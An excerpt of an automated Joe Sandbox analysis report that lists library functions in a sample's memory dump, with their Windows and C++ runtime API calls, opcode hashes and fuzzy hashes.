                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0043A0EA: _free.LIBCMT ref: 0043A113
                                                        • _free.LIBCMT ref: 0043A3F1
                                                          • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                          • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                        • _free.LIBCMT ref: 0043A3FC
                                                        • _free.LIBCMT ref: 0043A407
                                                        • _free.LIBCMT ref: 0043A45B
                                                        • _free.LIBCMT ref: 0043A466
                                                        • _free.LIBCMT ref: 0043A471
                                                        • _free.LIBCMT ref: 0043A47C
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                        • Instruction ID: c6d5b65f25628cde0ea29edd4ff893f52e85bca0f905c5b3a1529a10dd86fb4b
                                                        • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                        • Instruction Fuzzy Hash: 3311A232580B04A6D521BF72CC07FCB77AC6F2C306F40981EB6DA7A052CA6EB5105B46
                                                        Function 00412412 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412420
                                                        • GetLastError.KERNEL32 ref: 00412426
                                                        • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412453
                                                        • GetLastError.KERNEL32 ref: 0041245D
                                                        • GetLastError.KERNEL32 ref: 0041246F
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412485
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00412493
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                        • String ID:
                                                        • API String ID: 4227777306-0
                                                        • Opcode ID: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                        • Instruction ID: 772dfc6c110a2a8534dac99729108f53ec46fdbd0e11e7149f9ef709963b67bd
                                                        • Opcode Fuzzy Hash: 98e3d6891a0dd5d677cbf2f779bc3de9b57089e9d4dcd81604344dd870270d4b
                                                        • Instruction Fuzzy Hash: 56012B34A00125B7C720AF66ED09BEF376CEF42B52B60443BF805D2151DBACDA54866D
                                                        Function 00431EFA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                        • _free.LIBCMT ref: 00431F31
                                                        • _free.LIBCMT ref: 00431F59
                                                        • SetLastError.KERNEL32(00000000), ref: 00431F66
                                                        • SetLastError.KERNEL32(00000000), ref: 00431F72
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID: ('z
                                                        • API String ID: 3170660625-2735399949
                                                        • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                        • Instruction ID: 89f26f5adfa52999dd97e159cd61ed3cb5fd8874f2961931db20f525c950a72a
                                                        • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                        • Instruction Fuzzy Hash: 0AF02D3A50CA0037D61637356C06B5F26199FD9B67F30212FF814923F2EF6D8806412D
                                                        Function 0042FF04 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002), ref: 0042FF24
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF37
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0042FEB5,00000003,?,0042FE55,00000003,00457970,0000000C,0042FFAC,00000003,00000002,00000000), ref: 0042FF5A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: 11@$CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-3445089953
                                                        • Opcode ID: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                        • Instruction ID: b9f6d20b166e67f6b42c672312b3e089bcad04f0cb699fcb0f77a3f19f5d5cf1
                                                        • Opcode Fuzzy Hash: 565e8aad81c42c30b4556ccca566ef737f7629af4b303484cc6756d66643e6b5
                                                        • Instruction Fuzzy Hash: 09F0C834B00218BFDB109F50DD09B9EBFB4EF05B12F510076F805A2290CB799E44DA4C
                                                        Function 00428DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,F52E3FE0), ref: 00428E08
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428E16
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E2F
                                                        • SetLastError.KERNEL32(00000000,?,00428DF1,00426782,004406C0,00000008,00440A25,?,?,?,?,00423A6B,?,?,F52E3FE0), ref: 00428E81
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                        • Instruction ID: 13d4ce3fadb6930e01a7802674f608048713f2fc9b33e2444f23e675ffd4a1be
                                                        • Opcode Fuzzy Hash: 099e375051b82bcc48573fb8fc2ff44709712d60ae6e1d6d5c512736a9c417fd
                                                        • Instruction Fuzzy Hash: 7301D43230AB316EA6242BF67C8956F2744EB1577ABA1033FF510D12F1EE698C21954E
                                                        Function 00404D77 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00404D88
                                                        • int.LIBCPMT ref: 00404D9F
                                                          • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                          • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                        • std::locale::_Getfacet.LIBCPMT ref: 00404DA8
                                                        • std::_Facet_Register.LIBCPMT ref: 00404DD9
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DEF
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00404E0D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                        • Instruction ID: 4ef84c01712664b50a137fe66981e95a650a2e1b5a714d2619638ac2ebdb4e30
                                                        • Opcode Fuzzy Hash: 4c2bec8a94d2dfe1f31f48f90f5228b8d61b4d632ca62fad144830f22e520e62
                                                        • Instruction Fuzzy Hash: 9411A372D001189BCB15EBA5C841AEEB7B4AF54715F14017FE901BB2D2DB3C9A0587DC
                                                        Function 0040C1AE Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040C1BF
                                                        • int.LIBCPMT ref: 0040C1D6
                                                          • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                          • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                        • std::locale::_Getfacet.LIBCPMT ref: 0040C1DF
                                                        • std::_Facet_Register.LIBCPMT ref: 0040C210
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C226
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C244
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                        • Instruction ID: 1719d9dd00d927231adb6862ad7e4c37149c3208904b64558a42dcf46f1f70c2
                                                        • Opcode Fuzzy Hash: 4e144f3e275808a570db40f1fcdaa1681d1240728c494bcfa96d4ea4c14bb240
                                                        • Instruction Fuzzy Hash: 2011A072D00228DBCB14EBA4D891AEDB774AF44314F14057EE401BB2D2DF3C9A0587D9
                                                        Function 004054F7 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00405508
                                                        • int.LIBCPMT ref: 0040551F
                                                          • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                          • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                        • std::locale::_Getfacet.LIBCPMT ref: 00405528
                                                        • std::_Facet_Register.LIBCPMT ref: 00405559
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040556F
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040558D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                        • Instruction ID: 335d1a0449174c4850433ac7d89b0c6b75dcf3c5386a47d7b2396d3cdec16656
                                                        • Opcode Fuzzy Hash: e4ce11b37ce44f7ba8e9afc7401a0a9b198b24000e5175f43f23aaf661957535
                                                        • Instruction Fuzzy Hash: 5B117072D005289BCB15EBA4D841AEEB774EF44319F54013EE415BB2D2DB389E058B9C
                                                        Function 00405593 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004055A4
                                                        • int.LIBCPMT ref: 004055BB
                                                          • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                          • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                        • std::locale::_Getfacet.LIBCPMT ref: 004055C4
                                                        • std::_Facet_Register.LIBCPMT ref: 004055F5
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040560B
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00405629
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                        • Instruction ID: 8e1419515e35d36fc68c9e18a3e27bb0650dc63e33415fac19ced33b622727b6
                                                        • Opcode Fuzzy Hash: 512af338323df7cd9b5461e6ba28ebb24eb4a9fd8b3f2c51b537379dd0adb521
                                                        • Instruction Fuzzy Hash: B911AC729006289BCF14EBA0C841AEEB360EF44319F14043FE811BB2D2DB389A058BDC
                                                        Function 00404C39 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00404C4A
                                                        • int.LIBCPMT ref: 00404C61
                                                          • Part of subcall function 0040BD81: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD92
                                                          • Part of subcall function 0040BD81: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BDAC
                                                        • std::locale::_Getfacet.LIBCPMT ref: 00404C6A
                                                        • std::_Facet_Register.LIBCPMT ref: 00404C9B
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00404CB1
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CCF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                        • String ID:
                                                        • API String ID: 2243866535-0
                                                        • Opcode ID: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                        • Instruction ID: 7f60e392e4a430ae1f2c93b626e46d5b6b74a1b844d6ec56694562dd50cc071c
                                                        • Opcode Fuzzy Hash: 80a228f69bd2cb3116441d1b51d3088f88c36febe04a249c7f41ad217ba583fd
                                                        • Instruction Fuzzy Hash: 6811A072D001289BCB14EBA0C841AEEB7B0AF84319F11003EE511BB2E2DB3C990487D8
                                                        Function 0042370F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetEvent.KERNEL32(?,00000000), ref: 00423759
                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423741
                                                          • Part of subcall function 0041B74C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B76D
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0042378A
                                                        • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004237B3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                        • String ID: 11@
                                                        • API String ID: 2630251706-1785270423
                                                        • Opcode ID: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                        • Instruction ID: 33ce48ef146ac78a3ef221314cc781bfd8a3c25b4f9a6e194e2960aa52b33145
                                                        • Opcode Fuzzy Hash: 458ed3e5417ba220ed4bd1e4a28432a397d2c2fe66a31dff9dce91352e516156
                                                        • Instruction Fuzzy Hash: 9C110B757002106BCF047F65DC85DAE7765EF84772B10416BFA05D7292CFAC9E41CA98
                                                        Function 0041CE2D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE41
                                                        • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE65
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE78
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                        • String ID: pScheduler
                                                        • API String ID: 3657713681-923244539
                                                        • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                        • Instruction ID: 46b9ecfe0875f7f86596c353a9bffc422044863c42dab0ab2bac390bf5a45ba1
                                                        • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                        • Instruction Fuzzy Hash: 8FF0593594070863C324EB15DC828DEB3799E91728360812FE40563182CF3CAE8AC69D
                                                        Function 0041E63D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E65F
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E672
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E680
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                        • String ID: 11@$pContext
                                                        • API String ID: 1990795212-1086721755
                                                        • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                        • Instruction ID: 1f218d0b40ab772f1aed9042d58143e35ca4ab3a9892fa22be9c34d269449320
                                                        • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                        • Instruction Fuzzy Hash: 45E06139B0011457CB04FB66DC06C5DB7A8AEC0B14750006FF901A3342DFB8A90585C8
                                                        Function 00411EB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Concurrency::critical_section::unlock.LIBCMT ref: 00411EBC
                                                          • Part of subcall function 00411132: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411153
                                                          • Part of subcall function 00411132: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041118A
                                                          • Part of subcall function 00411132: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411196
                                                        • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EC8
                                                          • Part of subcall function 00410AA3: Concurrency::critical_section::unlock.LIBCMT ref: 00410AC7
                                                        • Concurrency::Context::Block.LIBCONCRT ref: 00411ECD
                                                          • Part of subcall function 00412C81: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C83
                                                        • Concurrency::critical_section::lock.LIBCONCRT ref: 00411EED
                                                          • Part of subcall function 0041105B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411069
                                                          • Part of subcall function 0041105B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411076
                                                          • Part of subcall function 0041105B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411081
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
                                                        • String ID: 11@
                                                        • API String ID: 3659872527-1785270423
                                                        • Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                        • Instruction ID: 5f19519383477fd90e693e8c592c5b4d2a982a5ecb934fba7b69a42e3a353b75
                                                        • Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
                                                        • Instruction Fuzzy Hash: E8E0D8355005029BCB04FF21C5614DCFB617F44354B10825EE466432E1CF785D86CB88
                                                        Function 0042B126 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                        • Instruction ID: 7eacffcc392e6897453e427a1bc5d3d4951d53cce7b4b374ddd0667b65be5727
                                                        • Opcode Fuzzy Hash: 7096e54c8b2da2135de54d2c532f2528a1a3733c17ca5e9eea5bc4f64eff24f9
                                                        • Instruction Fuzzy Hash: FF718E31B00266DBCB21CF95E884ABFBB75EF45360FA8426BE81057280D7789D41C7E9
                                                        Function 00430A64 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                        • _free.LIBCMT ref: 00430B6F
                                                        • _free.LIBCMT ref: 00430B86
                                                        • _free.LIBCMT ref: 00430BA5
                                                        • _free.LIBCMT ref: 00430BC0
                                                        • _free.LIBCMT ref: 00430BD7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 3033488037-0
                                                        • Opcode ID: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                        • Instruction ID: b3708cb7fd5f7c05c7b70e76ebc142bc523ed94c66de99b1f2255d1376b2cc69
                                                        • Opcode Fuzzy Hash: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                        • Instruction Fuzzy Hash: BD51DF31A00304ABDB21DF6AC851A6BB7F4EF58724F14566EE809DB250E739A901CB48
                                                        Function 004314FB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                        • Instruction ID: 2269d71fc1307fb615fcd26a16e66de3d258f5a42cea17c2f792775dd2d74ff0
                                                        • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                        • Instruction Fuzzy Hash: E541C432E00204AFCB10DF78C981A5AB7B5EF89714F15456EE516EB391DB35ED02CB84
                                                        Function 004368BD Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D11A,00000000,00000000,0042D958,?,0042D958,?,00000001,0042D11A,23E85006,00000001,0042D958,0042D958), ref: 0043690A
                                                        • __alloca_probe_16.LIBCMT ref: 00436942
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436993
                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004369A5
                                                        • __freea.LIBCMT ref: 004369AE
                                                          • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                        • String ID:
                                                        • API String ID: 313313983-0
                                                        • Opcode ID: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                        • Instruction ID: 564015b8663966f91a736df8c1f199cffa5732d11cc50b43fea489f3b547491b
                                                        • Opcode Fuzzy Hash: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                        • Instruction Fuzzy Hash: 0A31CE72A0020AAFDF249F65CC41EAF7BA5EF44714F16422AFC04D6290EB39CD54CB98
                                                        Function 0041AEE6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _SpinWait.LIBCONCRT ref: 0041AF0B
                                                          • Part of subcall function 00410F41: _SpinWait.LIBCONCRT ref: 00410F59
                                                        • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AF1F
                                                        • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF51
                                                        • List.LIBCMT ref: 0041AFD4
                                                        • List.LIBCMT ref: 0041AFE3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                        • String ID:
                                                        • API String ID: 3281396844-0
                                                        • Opcode ID: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                        • Instruction ID: 96d9cd947b213099fbcac924e0358b3b7b3cf073485a4601a3d8c747dc036099
                                                        • Opcode Fuzzy Hash: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
